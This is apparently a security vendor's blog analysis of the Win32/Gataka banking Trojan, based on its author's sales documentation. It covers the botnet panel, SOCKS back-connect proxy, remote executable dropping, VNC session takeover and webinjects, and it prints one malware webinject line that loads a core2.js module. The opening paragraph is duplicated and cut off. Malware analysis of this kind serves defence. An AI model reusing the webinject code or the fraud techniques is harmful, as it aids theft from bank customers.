Win32/Gataka is an information-stealing Trojan that has been previously discussed on this blog here and here. Recently, we came across a post from its author on an underground forum trying to sell his creation. The post contained a help file detailing the inner working of this threat. This blog post will highlight some of the

Win32/Gataka is an information-stealing Trojan that has been previously discussed on this blog here and here. Recently, we came across a post from its author on an underground forum trying to sell his creation. The post contained a help file detailing the inner working of this threat. This blog post will highlight some of the most interesting part of this help file.

First off, it is interesting to note that the malware author is trying to sell the kit under the name Zutick. The asking price is $3,300 for both the control panel and builder. The documentation states that this Trojan works with all versions of Windows (32- and 64-bit) and its installation and operation doesn’t require administrative rights. It offers many plugins that facilitate the stealing of sensitive information, mainly through injection of arbitrary content into the compromised host browser. More information on the techniques used by this malware to intercept user content can be found here. The documentation states that all major browsers are supported: Internet Explorer, Firefox, Chrome, Opera and Safari.

Panel

The panel offers many features for tracking and management of the botnet. It can automatically send notifications to Jabber and provide a wealth of statistics for each compromised host. Among other things, it is possible to ascertain exactly which software is installed and active on a specific host. The botmaster can also blacklist or whitelist specific processes on a compromised host. Another interesting feature is that a Domain Generation Algorithm (DGA) is available as a fallback mechanism if the C&C URLs hardcoded in the client become inaccessible. The following sections will highlight the most interesting features described in the documentation.

SOCKS proxy

The SOCKS plugin supports SOCKS4, SOCKS5, HTTP and HTTPS protocols. Through this plugin, it is possible to set up a back-connect shell on a compromised host. Screenshots shown below explain how to set up a SOCKS proxy (please note that all comments on the screenshots were only in Russian. We added an English translation in parenthesis for clarity):

Choose the country for the proxy:

Pick the exact bot:

Task manager

Through the admin panel, the botmaster can send commands to one or multiple bots. The screenshots shown below show how to drop an executable on compromised host(s) and execute it:

VNC

Win32/Gataka provides a GUI interface to control a computer remotely through a VNC session. For example, it can control a browser on a compromised host, taking over a secure session. This can be useful in order to impersonate the user so as to perform fraudulent transactions on his behalf. The screenshots below show the steps required for setting up a VNC connection and the GUI interface used to control the remote host.

Webinjects

All webinjects are stored on the C&C server and can be pushed to the bots. The screenshots below show how to manage the import and delivery of the webinjects to the compromised hosts.

List of active webinjects on the C&C panel:

There is also a special function to convert any Zeus compatible webinject to Win32/Gataka format.

The documentation also states that there is an embedded JavaScript engine in one of the plugins. This allows for stealthier webinject as the injected scripts do not execute in the browser engine and thus bypass all its security checks for JavaScript code. Through this plugin, the JavaScript code has full access to the functionalities of the bot or plugins. This platform, called core2.js, can be included in any webinject using the following syntax:

<script>document.write("<script type='text/javascript' src='"+window.location.protocol+'//'+window.location.host+((window.location.protocol.indexOf('https')===-1)?":88":":444")+"/tatangakatanga/x.php?cmdid=8&gettype=js&id=core2.js&uid=%_uidpage_%'></scr"+"ipt>");</script>

We will now dissect the way in which the webinject can interact with the plugins installed on the compromised host. Notice the usage of port 88 for HTTP traffic and 444 for HTTPS traffic. These ports are monitored by the main platform and can thus be used to send commands from the JavaScript to the main platform. Through this technique, different types of content can be downloaded: images, scripts, html, and so on. The desired content is specified in the “gettype” argument.

The “cmdid” argument can also be used to specify other actions that should be conducted from the main platform. The following screenshot shows some of the functions from the core2.js JavaScript platform.

As can be seen from the screenshot above, the webinject can instruct the main platform to take videos of the current webpage. It can also store information in registry keys and fetch them later on. This technique can be very handy when performing fraudulent bank transfers in order to save the amount and the account number that was used in the transfer. This technique is depicted in the following webinject file that was downloaded by one of the campaigns we tracked in the last couple of months:

Conclusion

The webinject capabilities of this Trojan are rather interesting. The idea of having a centralized core JavaScript module that can be used by the webinject to access all functionalities from the main platform is particularly interesting. We will continue to monitor this malware for any new developments.

Special thanks to my colleague Aleksandr Matrosov who provided intel for this blog post.